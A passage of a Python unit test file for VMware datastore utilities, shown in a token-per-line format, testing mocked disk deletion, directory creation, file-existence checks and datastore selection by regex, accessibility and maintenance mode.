name|'disk_delete'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-dc-ref'"
op|','
string|"'[ds] tmp/disk.vmdk'"
op|')'
newline|'\n'
name|'_wait_for_task'
op|'.'
name|'assert_called_once_with'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'cm'
op|')'
newline|'\n'
name|'_call_method'
op|'.'
name|'assert_called_once_with'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'ANY'
op|','
string|"'DeleteVirtualDisk_Task'"
op|','
string|"'VirtualDiskManager'"
op|','
nl|'\n'
name|'datacenter'
op|'='
string|"'fake-dc-ref'"
op|','
name|'name'
op|'='
string|"'[ds] tmp/disk.vmdk'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_mkdir
dedent|''
dedent|''
name|'def'
name|'test_mkdir'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'MakeDirectory'"
op|','
name|'method'
op|')'
newline|'\n'
name|'name'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'name'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path'"
op|','
name|'name'
op|')'
newline|'\n'
name|'datacenter'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'datacenter'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-dc-ref'"
op|','
name|'datacenter'
op|')'
newline|'\n'
name|'createParentDirectories'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'createParentDirectories'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'createParentDirectories'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'ds_util'
op|'.'
name|'mkdir'
op|'('
name|'self'
op|'.'
name|'session'
op|','
name|'ds_path'
op|','
string|"'fake-dc-ref'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_exists
dedent|''
dedent|''
name|'def'
name|'test_file_exists'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'SearchDatastore_Task'"
op|':'
newline|'\n'
indent|' '
name|'ds_browser'
op|'='
name|'args'
op|'['
number|'0'
op|']'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'fake-browser'"
op|','
name|'ds_browser'
op|')'
newline|'\n'
name|'datastorePath'
op|'='
name|'kwargs'
op|'.'
name|'get'
op|'('
string|"'datastorePath'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|"'[ds] fake/path'"
op|','
name|'datastorePath'
op|')'
newline|'\n'
name|'return'
string|"'fake_exists_task'"
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_wait_for_task
dedent|''
name|'def'
name|'fake_wait_for_task'
op|'('
name|'task_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'task_ref'
op|'=='
string|"'fake_exists_task'"
op|':'
newline|'\n'
indent|' '
name|'result_file'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'result_file'
op|'.'
name|'path'
op|'='
string|"'fake-file'"
newline|'\n'
nl|'\n'
name|'result'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'result'
op|'.'
name|'file'
op|'='
op|'['
name|'result_file'
op|']'
newline|'\n'
name|'result'
op|'.'
name|'path'
op|'='
string|"'[ds] fake/path'"
newline|'\n'
nl|'\n'
name|'task_info'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'task_info'
op|'.'
name|'result'
op|'='
name|'result'
newline|'\n'
nl|'\n'
name|'return'
name|'task_info'
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'fake_wait_for_task'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'file_exists'
op|'='
name|'ds_util'
op|'.'
name|'file_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-browser'"
op|','
name|'ds_path'
op|','
string|"'fake-file'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'file_exists'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_file_exists_fails
dedent|''
dedent|''
name|'def'
name|'test_file_exists_fails'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'method'
op|'=='
string|"'SearchDatastore_Task'"
op|':'
newline|'\n'
indent|' '
name|'return'
string|"'fake_exists_task'"
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|function|fake_wait_for_task
dedent|''
name|'def'
name|'fake_wait_for_task'
op|'('
name|'task_ref'
op|')'
op|':'
newline|'\n'
indent|' '
name|'if'
name|'task_ref'
op|'=='
string|"'fake_exists_task'"
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'vexc'
op|'.'
name|'FileNotFoundException'
op|'('
op|')'
newline|'\n'
nl|'\n'
comment|'# Should never get here'
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'test'
op|'.'
name|'nested'
op|'('
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|','
nl|'\n'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_wait_for_task'"
op|','
nl|'\n'
name|'fake_wait_for_task'
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_path'
op|'='
name|'ds_obj'
op|'.'
name|'DatastorePath'
op|'('
string|"'ds'"
op|','
string|"'fake/path'"
op|')'
newline|'\n'
name|'file_exists'
op|'='
name|'ds_util'
op|'.'
name|'file_exists'
op|'('
name|'self'
op|'.'
name|'session'
op|','
nl|'\n'
string|"'fake-browser'"
op|','
name|'ds_path'
op|','
string|"'fake-file'"
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'file_exists'
op|')'
newline|'\n'
nl|'\n'
DECL|member|_mock_get_datastore_calls
dedent|''
dedent|''
name|'def'
name|'_mock_get_datastore_calls'
op|'('
name|'self'
op|','
op|'*'
name|'datastores'
op|')'
op|':'
newline|'\n'
indent|' '
string|'"""Mock vim_util calls made by get_datastore."""'
newline|'\n'
nl|'\n'
name|'datastores_i'
op|'='
op|'['
name|'None'
op|']'
newline|'\n'
nl|'\n'
comment|'# For the moment, at least, this list of datastores is simply passed to'
nl|'\n'
comment|'# get_properties_for_a_collection_of_objects, which we mock below. We'
nl|'\n'
comment|"# don't need to over-complicate the fake function by worrying about its"
nl|'\n'
comment|'# contents.'
nl|'\n'
name|'fake_ds_list'
op|'='
op|'['
string|"'fake-ds'"
op|']'
newline|'\n'
nl|'\n'
DECL|function|fake_call_method
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
comment|'# Mock the call which returns a list of datastores for the cluster'
nl|'\n'
indent|' '
name|'if'
op|'('
name|'module'
op|'=='
name|'ds_util'
op|'.'
name|'vutil'
name|'and'
nl|'\n'
name|'method'
op|'=='
string|"'get_object_property'"
name|'and'
nl|'\n'
name|'args'
op|'=='
op|'('
string|"'fake-cluster'"
op|','
string|"'datastore'"
op|')'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_ds_mor'
op|'='
name|'fake'
op|'.'
name|'DataObject'
op|'('
op|')'
newline|'\n'
name|'fake_ds_mor'
op|'.'
name|'ManagedObjectReference'
op|'='
name|'fake_ds_list'
newline|'\n'
name|'return'
name|'fake_ds_mor'
newline|'\n'
nl|'\n'
comment|'# Return the datastore result sets we were passed in, in the order'
nl|'\n'
comment|'# given'
nl|'\n'
dedent|''
name|'if'
op|'('
name|'module'
op|'=='
name|'ds_util'
op|'.'
name|'vim_util'
name|'and'
nl|'\n'
name|'method'
op|'=='
string|"'get_properties_for_a_collection_of_objects'"
name|'and'
nl|'\n'
name|'args'
op|'['
number|'0'
op|']'
op|'=='
string|"'Datastore'"
name|'and'
nl|'\n'
name|'args'
op|'['
number|'1'
op|']'
op|'=='
name|'fake_ds_list'
op|')'
op|':'
newline|'\n'
comment|'# Start a new iterator over given datastores'
nl|'\n'
indent|' '
name|'datastores_i'
op|'['
number|'0'
op|']'
op|'='
name|'iter'
op|'('
name|'datastores'
op|')'
newline|'\n'
name|'return'
name|'next'
op|'('
name|'datastores_i'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
nl|'\n'
comment|'# Continue returning results from the current iterator.'
nl|'\n'
dedent|''
name|'if'
op|'('
name|'module'
op|'=='
name|'ds_util'
op|'.'
name|'vutil'
name|'and'
nl|'\n'
name|'method'
op|'=='
string|"'continue_retrieval'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'try'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'next'
op|'('
name|'datastores_i'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
dedent|''
name|'except'
name|'StopIteration'
op|':'
newline|'\n'
indent|' '
name|'return'
name|'None'
newline|'\n'
nl|'\n'
dedent|''
dedent|''
name|'if'
op|'('
name|'method'
op|'=='
string|"'continue_retrieval'"
name|'or'
nl|'\n'
name|'method'
op|'=='
string|"'cancel_retrieval'"
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
newline|'\n'
nl|'\n'
comment|"# Sentinel that get_datastore's use of vim has changed"
nl|'\n'
dedent|''
name|'self'
op|'.'
name|'fail'
op|'('
string|"'Unexpected vim call in get_datastore: %s'"
op|'%'
name|'method'
op|')'
newline|'\n'
nl|'\n'
dedent|''
name|'return'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'side_effect'
op|'='
name|'fake_call_method'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore
dedent|''
name|'def'
name|'test_get_datastore'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds-2"'
op|','
number|'2048'
op|','
number|'1000'
op|','
nl|'\n'
name|'False'
op|','
string|'"normal"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds-3"'
op|','
number|'4096'
op|','
number|'2000'
op|','
nl|'\n'
name|'True'
op|','
string|'"inMaintenance"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"fake-ds"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'units'
op|'.'
name|'Ti'
op|','
name|'result'
op|'.'
name|'capacity'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertEqual'
op|'('
number|'500'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
name|'result'
op|'.'
name|'freespace'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_regex
dedent|''
name|'def'
name|'test_get_datastore_with_regex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test with a regex that matches with a datastore'
nl|'\n'
indent|' '
name|'datastore_valid_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"^openstack.*\\d$"'
op|')'
newline|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds1"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
nl|'\n'
name|'datastore_valid_regex'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"openstack-ds0"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_token
dedent|''
name|'def'
name|'test_get_datastore_with_token'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"^ds.*\\d$"'
op|')'
newline|'\n'
name|'fake0'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake0'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"ds0"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'5'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
name|'fake0'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"foo"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'9'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
name|'setattr'
op|'('
name|'fake0'
op|','
string|"'token'"
op|','
string|"'token-0'"
op|')'
newline|'\n'
name|'fake1'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake1'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"ds2"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'8'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
name|'fake1'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"ds3"'
op|','
number|'10'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|','
number|'1'
op|'*'
name|'units'
op|'.'
name|'Gi'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake0'
op|','
name|'fake1'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
name|'regex'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertEqual'
op|'('
string|'"ds2"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_list
dedent|''
name|'def'
name|'test_get_datastore_with_list'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test with a regex containing whitelist of datastores'
nl|'\n'
indent|' '
name|'datastore_valid_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"(openstack-ds0|openstack-ds2)"'
op|')'
newline|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds1"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"openstack-ds2"'
op|')'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'result'
op|'='
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
nl|'\n'
name|'datastore_valid_regex'
op|')'
newline|'\n'
dedent|''
name|'self'
op|'.'
name|'assertNotEqual'
op|'('
string|'"openstack-ds1"'
op|','
name|'result'
op|'.'
name|'name'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_with_regex_error
dedent|''
name|'def'
name|'test_get_datastore_with_regex_error'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
comment|'# Test with a regex that has no match'
nl|'\n'
comment|'# Checks if code raises DatastoreNotFound with a specific message'
nl|'\n'
indent|' '
name|'datastore_invalid_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"unknown-ds"'
op|')'
newline|'\n'
name|'exp_message'
op|'='
op|'('
string|'"Datastore regex %s did not match any datastores"'
nl|'\n'
op|'%'
name|'datastore_invalid_regex'
op|'.'
name|'pattern'
op|')'
newline|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds0"'
op|')'
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'fake'
op|'.'
name|'Datastore'
op|'('
string|'"fake-ds1"'
op|')'
op|')'
newline|'\n'
comment|'# assertRaisesRegExp would have been a good choice instead of'
nl|'\n'
comment|"# try/catch block, but it's available only from Py 2.7."
nl|'\n'
name|'try'
op|':'
newline|'\n'
indent|' '
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'ds_util'
op|'.'
name|'get_datastore'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|','
nl|'\n'
name|'datastore_invalid_regex'
op|')'
newline|'\n'
dedent|''
dedent|''
name|'except'
name|'exception'
op|'.'
name|'DatastoreNotFound'
name|'as'
name|'e'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertEqual'
op|'('
name|'exp_message'
op|','
name|'e'
op|'.'
name|'args'
op|'['
number|'0'
op|']'
op|')'
newline|'\n'
dedent|''
name|'else'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'fail'
op|'('
string|'"DatastoreNotFound Exception was not raised with "'
nl|'\n'
string|'"message: %s"'
op|'%'
name|'exp_message'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_without_datastore
dedent|''
dedent|''
name|'def'
name|'test_get_datastore_without_datastore'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'fake'
op|'.'
name|'FakeObjectRetrievalSession'
op|'('
name|'None'
op|')'
op|','
name|'cluster'
op|'='
string|'"fake-cluster"'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_inaccessible_ds
dedent|''
name|'def'
name|'test_get_datastore_inaccessible_ds'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data_store'
op|'='
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
newline|'\n'
name|'data_store'
op|'.'
name|'set'
op|'('
string|'"summary.accessible"'
op|','
name|'False'
op|')'
newline|'\n'
nl|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'data_store'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_ds_in_maintenance
dedent|''
dedent|''
name|'def'
name|'test_get_datastore_ds_in_maintenance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'data_store'
op|'='
name|'fake'
op|'.'
name|'Datastore'
op|'('
op|')'
newline|'\n'
name|'data_store'
op|'.'
name|'set'
op|'('
string|'"summary.maintenanceMode"'
op|','
string|'"inMaintenance"'
op|')'
newline|'\n'
nl|'\n'
name|'fake_objects'
op|'='
name|'fake'
op|'.'
name|'FakeRetrieveResult'
op|'('
op|')'
newline|'\n'
name|'fake_objects'
op|'.'
name|'add_object'
op|'('
name|'data_store'
op|')'
newline|'\n'
nl|'\n'
name|'with'
name|'self'
op|'.'
name|'_mock_get_datastore_calls'
op|'('
name|'fake_objects'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_get_datastore_no_host_in_cluster
dedent|''
dedent|''
name|'def'
name|'test_get_datastore_no_host_in_cluster'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
DECL|function|fake_call_method
indent|' '
name|'def'
name|'fake_call_method'
op|'('
name|'module'
op|','
name|'method'
op|','
op|'*'
name|'args'
op|','
op|'**'
name|'kwargs'
op|')'
op|':'
newline|'\n'
indent|' '
name|'return'
string|"''"
newline|'\n'
nl|'\n'
dedent|''
name|'with'
name|'mock'
op|'.'
name|'patch'
op|'.'
name|'object'
op|'('
name|'self'
op|'.'
name|'session'
op|','
string|"'_call_method'"
op|','
nl|'\n'
name|'fake_call_method'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertRaises'
op|'('
name|'exception'
op|'.'
name|'DatastoreNotFound'
op|','
nl|'\n'
name|'ds_util'
op|'.'
name|'get_datastore'
op|','
nl|'\n'
name|'self'
op|'.'
name|'session'
op|','
string|"'fake-cluster'"
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_is_datastore_valid
dedent|''
dedent|''
name|'def'
name|'_test_is_datastore_valid'
op|'('
name|'self'
op|','
name|'accessible'
op|'='
name|'True'
op|','
nl|'\n'
name|'maintenance_mode'
op|'='
string|'"normal"'
op|','
nl|'\n'
name|'type'
op|'='
string|'"VMFS"'
op|','
nl|'\n'
name|'datastore_regex'
op|'='
name|'None'
op|','
nl|'\n'
name|'ds_types'
op|'='
name|'ds_util'
op|'.'
name|'ALL_SUPPORTED_DS_TYPES'
op|')'
op|':'
newline|'\n'
indent|' '
name|'propdict'
op|'='
op|'{'
op|'}'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.accessible"'
op|']'
op|'='
name|'accessible'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.maintenanceMode"'
op|']'
op|'='
name|'maintenance_mode'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.type"'
op|']'
op|'='
name|'type'
newline|'\n'
name|'propdict'
op|'['
string|'"summary.name"'
op|']'
op|'='
string|'"ds-1"'
newline|'\n'
nl|'\n'
name|'return'
name|'ds_util'
op|'.'
name|'_is_datastore_valid'
op|'('
name|'propdict'
op|','
name|'datastore_regex'
op|','
name|'ds_types'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid
dedent|''
name|'def'
name|'test_is_datastore_valid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'for'
name|'ds_type'
name|'in'
name|'ds_util'
op|'.'
name|'ALL_SUPPORTED_DS_TYPES'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertTrue'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
name|'ds_type'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_inaccessible_ds
dedent|''
dedent|''
name|'def'
name|'test_is_datastore_valid_inaccessible_ds'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'False'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"VMFS"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_ds_in_maintenance
dedent|''
name|'def'
name|'test_is_datastore_valid_ds_in_maintenance'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"inMaintenance"'
op|','
nl|'\n'
string|'"VMFS"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_ds_type_invalid
dedent|''
name|'def'
name|'test_is_datastore_valid_ds_type_invalid'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"vfat"'
op|')'
op|')'
newline|'\n'
nl|'\n'
DECL|member|test_is_datastore_valid_not_matching_regex
dedent|''
name|'def'
name|'test_is_datastore_valid_not_matching_regex'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'datastore_regex'
op|'='
name|'re'
op|'.'
name|'compile'
op|'('
string|'"ds-2"'
op|')'
newline|'\n'
name|'self'
op|'.'
name|'assertFalse'
op|'('
name|'self'
op|'.'
name|'_test_is_datastore_valid'
op|'('
name|'True'
op|','
nl|'\n'
string|'"normal"'
op|','
nl|'\n'
string|'"VMFS"'
op|','
nl|'\n'
name|'datastore_regex'
op|')'
op|')'
newline|'\n'
nl|'\n'
